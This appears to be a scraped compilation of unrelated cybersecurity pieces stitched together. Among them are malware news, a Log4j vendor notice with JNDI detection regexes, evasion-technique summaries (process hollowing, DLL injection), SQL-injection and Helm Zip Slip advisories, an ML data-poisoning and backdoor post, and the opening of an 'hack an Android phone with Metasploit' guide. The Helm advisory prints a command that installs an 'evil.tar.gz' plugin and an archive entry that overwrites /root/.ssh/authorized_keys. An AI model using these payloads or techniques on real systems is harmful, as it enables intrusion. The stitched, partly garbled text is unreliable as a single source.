Ramnit- Ramnit is a modular banking Trojan first discovered in 2010. Ramnit steals online session information, allowing its operators to steal account credentials for all services used by the victim, including bank accounts and corporate accounts and social network accounts. The Trojan uses both hard-coded domains and domains created by a DGA (Domain Generation Algorithm) to communicate with the C&C server and download additional modules.
Joker- An android Spyware on Google Play, designed to steal SMS messages, contact lists and device information. In addition, the malware silently signals to the victim for premium services on advertising sites.
|The top 10 per country|
Are Check Point Software's Global Threat Impact List and ThreatCloud Map based on its ThreatCloud intelligence? Company, the largest network for cooperation in the fight against cybercrime, which provides data on threats and trends in attacks, utilizing a global network of threat detectors.
The ThreatCloud database includes over 3 billion websites and 600 million files daily and detects more than 250 million malware activities each day.
The full list of the top 10 malware families in January can be found at blog of Check Point.
Registration in iGuRu.gr via email
Follow us on Google News
|
The latest cyber vulnerability that lies in the Log4j open source Apache logging framework has been impacting systems worldwide. The recent vulnerability report called Log4j is a critical vulnerability for Java-based applications, as it can lead to a RCE depending on the configuration of the system. There is active exploitation in the wild and systems are reporting that various Trojans, ransomware, and crypto miners have been known to be loaded.
Some details on the vulnerability are:
“CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library. This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use. End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates.”
The Snare Agents are not vulnerable to the Log4j vulnerability.
Our Snare Agents do not use any Java, Apache, IIS or .Net based components and have minimal third party-based libraries such as OpenSSL as they are based on C++ code base, which reduces the attack surface. All third party modules are updated regularly as part of software updates and depending if a vulnerability is detected in one of these modules.
The Snare Central log management and reporting system is also not vulnerable in its default configuration as its not running any Java components by default. However, if a customer has enabled the Elasticsearch option used for the add-on Analytics application, then it can raise the risk. Elasticsearch access is restricted by an authentication proxy and is not directly accessible from the network. The only direct access method is via an existing shell on the server or from the system console.
FROM THE ELASTICSEARCH ADVISORY
Elasticsearch is not susceptible to remote code execution with this vulnerability due to our use of the Java Security Manager. Elasticsearch on JDK8 or below is susceptible to an information leak via DNS which is fixed by a simple JVM property change. The information leak does not permit access to data within the Elasticsearch cluster.
SUGGESTED MITIGATION FOR SNARE CENTRAL INSTALLS IF ELASTICSEARCH HAS BEEN ENABLED
Update the /etc/elasticsearch/jvm.options file with the additional parameter in the log4j section around line.
Restart elasticsearch once the file has been saved with
“service elasticsearch restart” or “systemctl restart snare.service”.
We will incorporate this update mitigation in the next patch for Snare Central.
HOW TO USE SNARE CENTRAL TO DETECT LOG4J ATTACKS
You can use the dynamic search option to look for JNDI and LDAP requests in the webserver logs you collect using the Snare Agents using a query similar to the following:
DATE>=’5′ AND TABLE = ‘WebLog’ AND ALLFIELDS REGEXI ‘JNDI|LDAP’
This will search the WebLogs that the Snare Agents are collecting from IIS or Apache systems for the last 5 days – it is a case insensitive search. You can adjust the timeframe to suit. Indications are that attacks have been occurring since December 1st to check all the logs since then.
Typically the logs will show something in this form within the logs:
Other application logs should also be reviewed for other patterns such as:
You can run an extended search using the following:
DATE>=’13’ AND TABLE = ‘WebLog’ AND ALLFIELDS REGEXI ‘jndi:(ldap|ldaps|rmi|dns|iiop|\$)’
Some examples of activity seen in logs”
Proxy logs can be searched using the standard reports where the logs were collected using the Snare Agents. The proxy logs may be a path to the Internet to access malicious content or used to exfiltrate data. By reviewing the top sites or users, it may highlight who and where the activity was coming from for compromised users and systems.
The standard reports are located here:
Reports\Application Audit\Proxy Servers
USER LATERAL MOVEMENT
Logins to other systems can be detected using the standard login reports to show which systems users are logging into. The report can be cloned as many times as needed with each of them having additional filters applied for specific users or groups of users to filter down to specific user account logging in to multiple systems. This could be an indication of account compromise if the user access was not legitimate. Out-of-hours login reports can also be run to see which accounts are being used in non standard working hours when the accounts would not normally be used.
The location for user login activity is found here for Windows and other operating systems:
Reports\Operating Systems\Login Activity
User and group changes can also be tracked and reported on. One of the changes the malware does is to change or add users to have privileged access. Tracking if users have been added or removed, system policy changes occurring, or audit logs being cleared can be a sign of malicious activity with the attacker trying to hide their tracks, hide group and group member changes as well as specific user changes for additional access.
Snare Central has reports for tracking administrative user activity located here:
Reports\Operating Systems\Administrative Activity
Reviewing process execution can be complicated in understanding what are normal applications used on the corporate network what are not. However, having context into what is run, then seeing what is abnormal can be done by reviewing the activities of the key systems then expanding to review other systems as needed. Where application white listing has been implemented the risk maybe lower, however not all organisations have been able to white list all application usage.
Snare Central has some base reports that allow the user to show what commands are being run on the systems.
If the customer also has sysmon installed, then it will provide additional information and parameters used in commands that are run, including PowerShell commands. The reports can be cloned as many times as needed and adjusted with additional filters to search for specific applications or exclude known white listed applications and then report on other unknown applications.
The location for process Monitoring can be found here:
Reports\Operating Systems\Process Monitoring
NETWORK ACTIVITY MONITORING
Where Snare Central is collecting firewall, router, switch and other logs from snort or other IDS/IPS systems it can help correlate actions performed by systems and/or users to show where downloads of malicious content or where data is being exfiltrated to. Reports can be created for a variety of network devices with filters being created to look for specific IP addresses of interest from either internal or external sites. In the case of this attack and any other compromised server may help narrow down what the actions were and how they were performed on the corporate network.
Some of the standard Network activity monitoring reports can be found here:
DATABASE ACTIVITY MONITORING
Database Activity Monitoring – as provided using our Snare MS SQL agent – can help provide additional information on what corporate data was accessed inside the MS SQL Server databases.
By tracking the access to the databases and reviewing the contents of the SQL commands and who was running them, it can provide additional forensics combined with the other user activity performed on the systems. There are several standard reports in Snare Central that provide details on Admin and DBA activity, database activity, and usage for specific commands. Users can report on login activity, use of user rights, review specific SQL events, report on objects accessed by using custom reports, and tune them based on the customer’s specific naming conventions.
Some of the standard reports can be found here:
Reports\Application Audit\MSSQL Server
For additional information on the log4j vulnerability and Snare, please contact our sales team, here.
|
SAN ANTONIO – San Antonio is Military City USA, so it could be looked at as Cybersecurity City USA. We have seen momentous upgrades in our cybersecurity career paths and education systems across the Alamo city.
Max Kilger, the director of the Data Analytics Program at UTSA, joined Leading SA on Sunday to talk all things cybersecurity, starting with TikTok.
“So there are a number of sort of significant threats from the app. The first, of course, is gathering information,” he said.
See the full interview in the video player above.
Kilger said the app collects data like watch history, search history and message content on TikTok.
“And so they’re basically gathering information that could be shared with the Chinese government. And this could be a huge counterintelligence bonanza for the Chinese state security service,” he said. “They could be collecting personal information on people who have sensitive jobs in the defense industry or in the military or government.”
Kilger said Facebook has a similar algorithm that controls what users see, but Facebook is not owned by a Chinese company that also has ties to the Chinese government.
“And so finally, you have to think about how TikTok might shape information. So say, for example, the upcoming 2024 election and how Tik Tok might basically micro-targeting people by looking at the information that they gather. And then micro-targeting messages that might influence how they vote in the 2024 presidential election,” Kilger said.
And of course, with the digital space being so ubiquitous, so is the threat of cybersecurity attacks.
He said on Feb. 17, the U.S. Marshals Office noticed data was being exfiltrated from one of their systems.
The U.S. Marshal’s office said most of the information was administrative data and they denied sensitive information like witness protection information was collected.
“But about three days ago, an unknown actor emerged on the dark web claiming to have 360 gigabytes of exfiltrated U.S. marshal data and fairly sensitive data. But it’s unclear. They’re trying to sell it for $150,000. It’s unclear whether this is a real offer or whether it’s just the cybercriminal basically trying to cash in on this ransomware attack, but doesn’t really have the data,” Kilger said.
Kilger said organizations need to put more emphasis and effort into securing their information.
UTSA is taking steps to educate cybersecurity experts of the future with their new San Pedro 1 facility downtown.
“They’ve taken some of the world-class scholars from UTSA and ensconced in that building, fabulous teaching facilities for students, emphasizing cybersecurity, data science, data analytics in all sorts of different disciplines,” he said. ”It’s a really amazing place, and they’re working really hard to integrate San Pedro 1 into the San Antonio community. So it’s really fabulous to see that happen.”
Original News Source Link
Need digital marketing for your business? Check out KingdomX Digital Marketing San Antonio!
|
UPDATE 3/23: Following the dumping of files by the hacking group LAPSUS$ it allegedly gathered from hacking Microsoft, Microsoft has now confirmed it was compromised through a single account.
As part of a security blog post published late yesterday, Microsoft included a section titled “Actor actions targeting Microsoft” which explains what happened:
“This week, the actor made public claims that they had gained access to Microsoft and exfiltrated portions of source code. No customer code or data was involved in the observed activities. Our investigation has found a single account had been compromised, granting limited access. Our cybersecurity response teams are quickly engaged to remediate the compromised account and prevent further activity.
Microsoft does not rely on the secrecy of code as a security measure and viewing source code does not lead to elevation of risk. The tactics DEV-0537 used in this intrusion reflect the tactics and techniques discussed in this blog. Our team was already investigating the compromised account based on threat intelligence when the actor publicly disclosed their intrusion. This public disclosure escalated our action allowing our team to intervene and interrupt the actor mid-operation, limiting broader impact.”
Although any successful hack is bad news for an organization, in this case it seems to be very limited and has no impact on Microsoft’s customers.
The recommendations by Microsoft to help prevent similar LAPSUS$ hacks includes using multifactor authentication for all users at all locations, encouraging strong passwords, using passwordless authentication if available, and adding a VPN as an extra layer of authentication.
Original Story 3/22:
The cybercriminal group that claims to have breached Microsoft has started to dump files allegedly taken from the hack.
On Monday, the LAPSUS$ gang began circulating a 10GB compressed archive that supposedly contains internal data on Microsoft’s Bing search engine and Bing Maps, along with the source code to the company’s voice assistant software Cortana.
“Bing Map is 90% complete dump. Bing and Cortana around 45%,” LAPSUS$ said in a post in the group’s public chatroom.
According to BleepingComputer, the archive expands to 37GB once it’s been uncompressed, and contains the source code to over 250 projects that appear to belong to Microsoft. If real, the file dump risks exposing sensitive information about the company, including data on employees and software certificates, which cybercriminals could further exploit.
Microsoft did not immediately respond to a request for comment. So far, the company has only said it’s investigating the alleged hack. However, the LAPSUS$ gang says the group has already lost access to Microsoft’s systems.
“Access died when I was sleeping,” one of the members wrote in the group’s public chat. “Would’ve been a complete dump. But we were all tired.”
Recommended by Our Editors
The file dump also occurs as LAPSUS$ may have revealed how it hacked Microsoft. On Monday, the group claimed it had breached Okta, a company that manages authentication systems for 15,000 brands.
“Thousands of companies use Okta to secure and manage their identities,” said IT security firm Checkpoint. “Through private keys retrieved within Okta, the cyber gang may have access to corporate networks and applications. Hence, a breach at Okta could lead to potentially disastrous consequences.”
In its public chat, LAPSUS$ said it did not steal any databases from Okta, but did target the company’s corporate customers. So far, Okta has only said it detected “an attempt to compromise the account of a third-party customer support engineer” working at a company “sub-processor” two months ago. But the incident was later contained.
“Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January,” Okta’s chief security officer said.
Like What You’re Reading?
Sign up for Security Watch newsletter for our top privacy and security stories delivered right to your inbox.
|
ping me in instagram:-
The basics of kali linux.
How to install a hacking lab & needed softward.
Hack & secure both WiFi & wired networks.
Understand how websites work.
howto use tools for hacking.
Discover vulnerabilities & exploit them to hack into servers.
Hack secure systems using client-side & social engineering.
Secure systems from all the attacks shown.
Learn linux commands & how to interact with the terminal.
Learn Network Hacking /…
|
Report: Iran Is Likely Setting Stage for International Phishing Campaign
Nextgov - 01-11
Phishing attacks only work when the target takes the bait. The email containing the link or attachment that will compromise the target’s computer has to look legitimate, from a recognizable domain. A new report says that someone — likely Iran — has been hijacking domains related to entities across the Middle East and North America, which could allow Iran to launch more, and more successful, cyber attacks.
|
Search Evasion Techniques
Names, Techniques, Definitions, Keywords
13 item(s) found so far for this keyword.
Dirty Vanity is a process injection technique that exploits the Windows forking (process reflection and snapshotting) feature to inject code into a new process.
It uses the
NtCreateProcess[Ex] primitives, along with the
PROCESS_DUP_HANDLE flags to reflect and execute code in a new process.
The technique also makes use of various methods, such as …
This technique leverages the
Transactional NTFS functionality in Windows. This functionality helps maintain data integrity during an unexpected error. For example, when an application needs to write or modify a file, if an error is triggered mid-write, the data can be corrupted. To avoid this kind of behavior, an application can open the file in a transactional mode to perform …
Reflective DLL loading refers to loading a DLL from memory rather than from disk. Windows doesn’t have a
LoadLibrary function that supports this, so to get the functionality you have to write your own, omitting some of the things Windows normally does, such as registering the DLL as a loaded module in the process, potentially bypassing DLL load monitoring.
Shellcode injection is a technique used by malware to execute arbitrary code within the context of a targeted process. One method of achieving this is through the use of the
CreateThreadpoolWait function, which is a part of the Windows thread pool API.
In the context of shellcode injection,
CreateThreadpoolWait is used to create a wait object that is associated with …
Process hollowing is a technique used by malware to evade detection by injecting malicious code into a legitimate process. This technique involves creating a new instance of a legitimate process and replacing its original code with the malicious payload.
The process is the following:
CreateProcess: in a suspended mode with the CreationFlag at 0x0000 0004.
GetThreadContext: retrieves the …
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).
Registration of new windows classes can include a request for up to 40 bytes of Extra Window Memory (EWM) to be appended to the allocated memory of each instance …
DLL Injection Via
LoadLibrary is a technique used by malware to inject its code into a legitimate process. This technique is similar to hook injection, where the malware inserts a malicious DLL to be used by the system. It is one of the most common techniques used to inject malware into another process.
The malware writes the path …
Process Reimaging is a technique used to evade detection by endpoint security solutions. It is a variation of the Process Hollowing or Process Doppelganging techniques, which are used to execute arbitrary code in the context of another process.
The Windows operating system has inconsistencies in how it determines the locations of process image FILE_OBJECTs, which can impact the ability of …
Thread execution hijacking is a technique used by malware to evade detection by targeting an existing thread of a process and avoiding any noisy process or thread creation operations. This technique allows the malware to run its code within the context of the targeted thread, without creating new processes or threads, which can be easily detected by security software.
Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.
Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access …
|
Think Twice Before Using USB Devices
If you are using USB Devices on your Computer, be careful next time as Security Researchers have detected data stealing trojan. Yes it might sound strange but its true as data stealing trojan is using USB devices to spread itself. Malware aka Win32/PSW.Stealer.NAI has been associated with data stealing capabilities and is known to be using USB devices as vector for targeting Windows system and hence it is rightly termed as USB Thief. This has been reported by Researchers of ESET Security. It has been crafted maliciously to spread on the system even if it is not connected with Internet Network. It has been so intelligently written that it cannot be copied and this is why it is very hard to predict about it and detect it easily. Since USB Thief is very much active and uses USB devices for stealing data, users hardly can notice that their system has been compromised and they are going to be a victim of data stealing. Thus it uses a very unique strategy for its propagation as well as making it difficult to be traced out as hardly it leaves any evidence.
more details: http://thehackernews.com/2016/03/usb-drive-malware.html
Moreover, it executes via USB removal devices and hence it cannot be easily leaked and this is why hardly any traces can be detected. Moreover it is device specific and is bound to specific usage and is carried out on the system running sans internet. It is known to be using portable version certain applications that are widely used and relied upon by users viz Firfox, NotePad++ as well as TrueCrypt.
Win32/PSW.Stealer.NAI True Nature of USB Thief
Win32/PSW.Stealer.NAI is so versatile in nature which can intrudes into your PC silently and allow online criminals for performing various illegal activities or processes. Some of the most common actions which has taken by Win32/PSW.Stealer.NAI are as follows:
Steal your crucial data – This threat is specially created by cyber crooks to steal your entire crucial data which stored onto your PC including id, banking login details, password, contact details etc.
Create backdoors – It is able to modify user security System so that their data and device can be easily accessed by the controller.
Turn your PC into Zombine – The main motive of this threat to use your PC as a slave in a network which is controlled by a single hacker.
Spying – It is able to track your browsing history, online activities and wait until you enter your crucial details so that it can invade your privacy.
Degrades the running speed of System and Internet – After intruding into System, it steals sensitive information.
This is why it is essential to take steps to remove malware from Windows PC, if you do not want to be a victim of cyber frauds.
|
Permissions, Privileges, and Access Controls
Search.pm in Bugzilla 2.17.1 through 3.2.6, 3.3.1 through 3.4.6, 3.5.1 through 3.6, and 3.7 allows remote attackers to obtain potentially sensitive time-tracking information via a crafted search URL, related to a "boolean chart search."
CWE-264 - Permissions Privileges and Access Controls
CWE 264 (permissions, privileges, and access controls) is not a weakness in and of itself, rather it is a category of weaknesses related to the management of permissions, privileges, and other security features used to perform access control. If not addressed, the weaknesses in this category allow attackers to gain privileges for an unintended sphere of control, access sensitive information, and execute arbitrary commands.
|
There are multiple vulnerabilities in NotifyLink that allow unauthenticated remote users to view or modify the contents of the NotifyLink SQL database. Possible modifications include the addition of unauthorized user and administrator accounts.
Notify Technology NotifyLink Enterprise Server allows users to synchronize e-mail between a PDA and a mail server. The application consists of a PDA-specific client and the NotifyLink server, which acts as a proxy between the client and the mail server(s) the user wants to check. For each e-mail account to be monitored, the user provides mail server credentials that are stored on the NotifyLink server and used to periodically check for mail. When new mail arrives, the NotifyLink server stores a reference to the message ID. Depending on the configuration, the message is either sent to the device via SMS ("Push" mode), or the device periodically checks a link on the NotifyLink web server to retrieve the message ("Poll" mode). The product supports multiple PDA platforms and multiple e-mail servers, including IMAP, POP, Microsoft Exchange, and Novell GroupWise.
The NotifyLink server stores client configuration and message data in a Microsoft SQL database that is accessible using an ASP web application. The database engine is vulnerable to SQL injection attacks that allow an attacker to make unauthorized queries against the SQL database. To exploit these vulnerabilities, an attacker would append the desired SQL query to one of several URLs generated by the ASP code. After processing the expected arguments, the ASP script will pass the injected SQL queries to the database engine for evaluation. This vulnerability affects multiple scripts within the NotifyLink application and can be used to accomplish a variety of tasks, including:
These vulnerabilities allow unauthenticated remote users to view or modify the contents of the NotifyLink SQL database. This database may contain email message text, encryption keys, and various authentication credentials. Possible modifications include the addition of unauthorized user and administrator accounts.
Upgrade or Patch
This issue is resolved in NotifyLink 3.0. Starting with this version, NotifyLink no longer creates SQL statements from user-supplied data.
We thank the NOAA NCIRT Lab for their discovery and analysis of this vulnerability.
This document was written by Jeffrey P Lanza and Will Dormann. It is based on analysis provided by the NOAA NCIRT Lab.
|Date First Published:||2005-03-17|
|Date Last Updated:||2005-04-20 21:26 UTC|
|
The practitioners of machine learning were recently reminded that we are not isolated from security threats. Recently, the PyTorch-nightly dependency chain was compromised. According to its website, PyTorch is “an open source machine learning framework that accelerates the path from research prototyping to production deployment.” Meaning, if compromised by adversaries a baseline result could be running malware on their systems that would extract credentials and other sensitive information from the build computers, but it could have been much worse. Depending on the attack scenario, the AI models themselves could have been modified or extracted, which would result in various attack scenarios depending on the intended use of the model.
While machine learning seems like a new and exciting field, it isn’t a new discipline. Artificial intelligence (AI) has been a mathematical discipline since we figured out how to use a delta function to gradually decrease the error of a given equation. Yet, we have not put the emphasis on security like we have with other computer programming disciplines.
Machine learning is a new discipline and requires new strategies to secure, because like all software projects there are always vulnerabilities. So, how can one hack an artificial intelligence? Well there are a number of ways depending on the technique used to implement it.
Hacking AI IRL
Let’s start with what happened recently. One of the major machine learning frameworks fell victim to what appears to be a type squatting attack. An attacker created a library that was similar or in some cases the same as a library that is called by an application, when the application, a python framework in this instance is updated, the repository pulls from the match that has the most priority which can be the most recently updated.
This resulted in a framework that was kept at the cutting edge of development, installing code that would copy protected information out of the OS that the framework was running as that could be used to create a breach into that application.
As bad as that is, it could be worse.
It could be possible to create an edge case or blind spot in an application built on a tampered framework that would affect its outcome during training. Imagine if some data set that the programmer intends to train the model on was provided by the injected code. It would be possible for any number of scenarios to occur, from market manipulation, self-driving cars not recognizing pedestrians who wore the wrong color shirt, to any number of weird scenarios. This leads me to another means to corrupt an AI.
Data Poisoning Attacks
There is an old programming adage that goes, “garbage in, garbage out” this is pretty much the thought process of a poisoning data attack. This is an attack in which an attacker corrupts the training data used to create an AI model, either during the initial or ongoing learning tracks.
For example, one of the most famous examples of this is Tai, a model created by Microsoft to handle natural language processing. However, it was designed to learn continuously, and a select few individuals decided to provide Tai with a dataset that consisted of offensive and biased language that made its responses reflect the data that it was trained with. Any AI that learns from information after it’s been put into production can be poisoned. Examples would be security software that monitors standard behavior being slowly modified so that “unusual” tasks become “normal,” or self-driving cars that are programmed to adjust to sensors that degrade may learn to react poorly to some incoming sensor data.
If the data provided to a model isn’t poisoned, it can still be hijacked. The most common method is model inversion or invasion, in this instance an attacker would need to have gained access to the model itself, and developed an area of the model where the classification may not be as strong as desired and look for cases that may not be entirely correct. One method to accomplish this may be to fuzz the inputs of a model and look for changes, but a more effective method would be to implement an AI to attack the original; such a technique would be creating Generative Adversarial Networks to create models that are close to the original training set in key points but different enough that they should not be accepted if the model was as precise as was intended.
In some case it may be possible to reverse engineer the model, by viewing the activation weighs of each of the hidden layers in order to speed up the above attacks, but this is a complicated process and can be easily protected against by adding a layer of encryption to the completed model.
How to Protect ML and AI from Attacks
There are a couple of methods that can be used to protect machine learning and artificial intelligence projects that are reasonably effective.
Protect your development environment: this includes your source code, your training sets, and filtering any data that gets added into your model.
Use a diverse training set: Depending on the data used for the model, consider employing more diverse data sets. While GAN’s are primarily thought of to help produce realistic images and sounds, they do so by finding connections and pathways that trick other AI’s into accepting they are created by something other than an AI. If the GAN starts to develop a training set that deviates greatly from the preset training data, then it may introduce weird edge cases where unexpected results may result. Such as finding patterns where Masterprints and “Accessorize to a Crime: Real and Stealthy Attacks on State-of-the-Art Face Recognition” and Targeted Backdoor Attacks on Deep Learning Systems Using Data Poisoning are possible.
Watermark or encrypt the model to make it harder for attackers to reverse engineer or clone.
Risk assessment: Before deploying any machine learning model, it’s important to assess the risks that the model may be targeted by and what risk it might pose — this includes identifying any potential attack vectors, and the likelihood/impact of a successful attack.
Monitoring and logging: flag suspicious access and any data supplied to the model. Occasionally confirm that no data resulted in atypical results.
Continual testing: Regularly testing the model to check that it hasn’t deviated in an unwarranted manner, check the hidden layers for areas that may be vulnerable to bad input. This can be done via fuzzing, visual analysis, removing layers and checking results, or just continuous evaluation of the model.
It’s important to note that these steps may not be a one-time occurrence. Protecting any software project is a continuous process, even one that’s operation is sometimes referred to as black magic, as the threat landscape and the technology is constantly changing. Additionally, it’s important to have a team that has knowledge in both the realms of AI and cybersecurity. The malicious mindset is invaluable to protecting assets such as this and even the most thorough engineer can miss some of the more devious “what-ifs.”
Necessary cookies help make a website usable by enabling basic functions like page navigation and access to secure areas of the website. The website cannot function properly without these cookies.
YouTube session cookie.
Marketing cookies are used to track visitors across websites. The intention is to display ads that are relevant and engaging for the individual user and thereby more valuable for publishers and third party advertisers.
Analytics cookies help website owners to understand how visitors interact with websites by collecting and reporting information anonymously.
Preference cookies enable a website to remember information that changes the way the website behaves or looks, like your preferred language or the region that you are in.
Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
Cookies are small text files that can be used by websites to make a user's experience more efficient. The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission. This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages.
Discover why security operations teams choose NetSPI.
|
A peek into the Sykipot campaigns
The group(s) behind the massive and consistent campaigns targeting US defense contractors with the Sykipot Trojan continue their attacks unabated, reports Symantec.
Its researchers have recently discovered and managed to take a peek into a staging server for the campaigns, which was also occasionally used as a C&C server for delivering instructions to the malware installed on the compromised computers.
In it they discovered many things that gave them insight into how the campaigns are differentiated and waged.
“Each campaign is marked with a unique identifier comprised of a few letters followed by a date hard-coded within the Sykipot Trojan itself. In some cases the keyword preceding the numbers is the sub-domain’s folder name on the Web server being used,” they shared. “These campaign markers allow the attackers to correlate different attacks on different organizations and industries.”
The location of the server (Beijing), those of attackers contacting it (Zhejiang province) and Chinese words contained in path and some file names seem to validate the theory that Chinese hackers are behind the attacks.
The researchers found over a hundred of of malicious files sent as attachments to the targets. They were mostly specially crafted PDF files that would drop the Trojan onto the targeted system once they were run.
The researchers point out that these files were created elsewhere and copied onto the system – from removable drives, via FTP or via instant messaging clients – but were unable to trace any of the individuals behind it or computers they used.
Through this server, they managed also to take a peek into another computer that belongs to the attackers, on which they discovered a tool that that modified the sent files so that they would evade detection.
“The Sykipot attackers have a long running history of attacks against multiple industries,” say the researchers. “Based on these insights, the attackers are familiar with the Chinese language and are using computer resources in China. They are clearly a group of attackers who are constantly modifying their creation to utilize new vulnerabilities and to evade security products and we expect that they will continue their attacks in the future.”
For a list of domains associated with the attacks, go here.
|
Arbitrary File Write via Archive Extraction (Zip Slip) Affecting helm.sh/helm/v3/pkg/plugin/installer Open this link in a new tab package, versions >=3.0.0 <3.2.4
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
16 Jun 2020
16 Jun 2020
Sam Sanoop of Snyk Security Team
How to fix?
helm.sh/helm/v3/pkg/plugin/installer to version 3.2.4 or higher.
helm.sh/helm/v3/pkg/plugin/installer is a Kubernetes Package Manager.
Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). When installing Helm plugins from a tar archive over HTTP, it is possible for a malicious plugin author to inject a relative path into a plugin archive, and copy a file outside of the intended directory, or overwrite contents of an arbitrary file where the path location is known.
Run helm plugin install https://github.com/snoopysecurity/Public/raw/master/payloads/evil.tar.gz`
The evil.tar.gz has a file called “../../../../../../../../tmp/test.txt”, which when extracted by the helm plugin installer will then move the test.txt file to the temp directory.
It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in
/root/.ssh/ overwriting the
+2018-04-15 22:04:29 ..... 19 19 good.txt
+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
|
You may have heard recent tech news regarding the Log4j vulnerability and be curious how it might affect your business or organization. Please read on to learn a bit more about what Log4j is, what the Log4j vulnerability is and does, and what steps are being taken to mitigate the issue.
In layman’s terms, log4k is a logging framework written in Java. It is used for tasks that are very common—to the point of being considered mundane by many. This includes items such as logging, debugging, and other tasks commonly occurring in website applications. Because Log4j is open source and the tasks it performs are fundamental to testing and maintaining websites, it is very common in use and applied in thousands of webpage uses every day. This makes the vulnerability particularly dangerous.
The basic premise of the Log4j vulnerability is that a set of characters were discovered to execute code on the host machine when data was sent to the website in a particular manner. Known as remote code execution, or RCE, exploiting the Log4j vulnerability can essentially result in a bad actor being able to execute files and scripts on the affected machine which can lead to almost any outcome desired—data theft, malware execution (to include ransomware), and the like. A more technical explanation is available via the Huntress post on the Log4j vulnerability.
Recent versions of Log4j have addressed the vulnerability, although new vulnerabilities continue to be discovered and patched. In other words, as of this writing, discovery and fixes are on-going.
Unsurprisingly, malicious actors and organizations are busy trying to discover unpatched instances of this logging framework. In the aforementioned post, Huntress describes the issue as follows:
Because of its large attack surface and the innate severity of remote code execution, security researchers are notably calling this a “shellshock” vulnerability. All threat actors need to trigger an attack is one line of text. There’s no obvious target for this vulnerability—hackers are taking a spray-and-pray approach to wreak havoc.
After verifying with our software partners, we are happy to report that no issues have been identified internally and no action is required on our end to protect our and our clients’ systems. However, with these situations it is important to remain vigilant as the situation progresses.
Not sure if your business or organization are vulnerable? GET IN TOUCH and our team of security experts can assist!
|
Comprehensive incoming traffic from Tor IP addresses for password spray campaigns.
Emulation of Firefox or Chrome browsers in password spray campaigns.
Enumeration of Exchange ActiveSync (most common) or Autodiscover endpoints.
Usage of enumeration/password spray tool comparable to the o365spray tool hosted at https://github.com/0xZDH/o365spray.
Use of Autodiscover to confirm accounts and passwords.
Found password spray activity frequently topping between 04:00:00 and 11:00:00 UTC.
Iranian hackers have actually recently assaulted Microsoft in which more than 250 Microsft Office 365 accounts that are connected to the United States, the European Union, and the Israeli government were being jeopardized through extensive password spraying.
You can follow us on Linkedin, Twitter, Facebook for everyday Cybersecurity and hacking news updates.
Regardless of having strong security, the Iranian hazard actors have actually managed to categorize the vulnerabilities of their businesss protection and infiltrate them..
A series of behaviors and methods are being used by the enemies, and thats why here we have actually discussed some of them below:-.
After understanding about the attack, Microsoft asserts that companies that have actually been assaulted by Iranian groups are presently working with the EU, the United States, and Israel in the production of defense technologies.
Here are some of the defenses that are to be followed by the companies to keep themself safe from this type of attack:-.
The primary intention of the DEV-0343 operators is to get to commercial satellite description and their own strategies and shipping records, which would be used to increase Irans establishing satellite program.
Constantly permit multifactor authentication.
Microsoft fully assists customers to download and use passwordless resolutions such as Microsoft Authenticator to keep the accounts safe.
Examine and implement authorized Exchange Online access policies.
Keep in mind to obstruct all incoming traffic from anonymizing services.
Thats why Microsoft verified that each and every customer needs to stay knowledgeable about this type of attack, as they are rather damaging in nature and can put a great deal of effect on various organizations.
|
Spoofing and jamming detection and mitigation
A GNSS spoofer is a device able to broadcast a slightly more powerful signal than that received from the GNSS satellites. The spoofing signal is modified with respect to a normal GNSS signal in such a way as to cause the receiver to determine its position to be somewhere other than where it actually is. A spoofing attack can be very dangerous, and the research on this topic is especially devoted to both spoofing attack identification, and antispoofing techniques.
A GNSS jammer is a device able to create a disruptive interference, which prevents a GNSS receiver to receive the satellite signals. A jamming attack can be very dangerous, and the research on this topic is especially devoted to increase the robustness of GNSS receivers against this type of attack.
Experiments and simulation studies have been performed in the ISMB lab to identify methods to detect and mitigate spoofing and jamming attacks.
|
Hack Android Phone Using Metasploit: A Comprehensive Guide
Android is one of the most popular operating systems worldwide, with over 2.5 billion active devices. However, with its increasing popularity, hackers are also targeting Android devices more than ever before. One of the most effective ways to hack an Android phone is by using Metasploit. In this article, we will provide you with a comprehensive guide on how to hack an Android phone using Metasploit.
What is Hack Android Phone Using Metasploit?
Metasploit is an open-source framework used for developing and executing exploits against a remote target machine. In simple terms, it is a tool used by security researchers and hackers to find vulnerabilities in computer systems and exploit them. In the case of Android devices, Metasploit can be used to remotely access an Android device and gain control over it. To hack an Android phone using Metasploit, the attacker needs to create a payload and a listener. The payload is a code that needs to be executed on the victim’s device, and the listener is a code that waits for the connection from the payload.
The Process of Hacking an Android Phone Using Metasploit
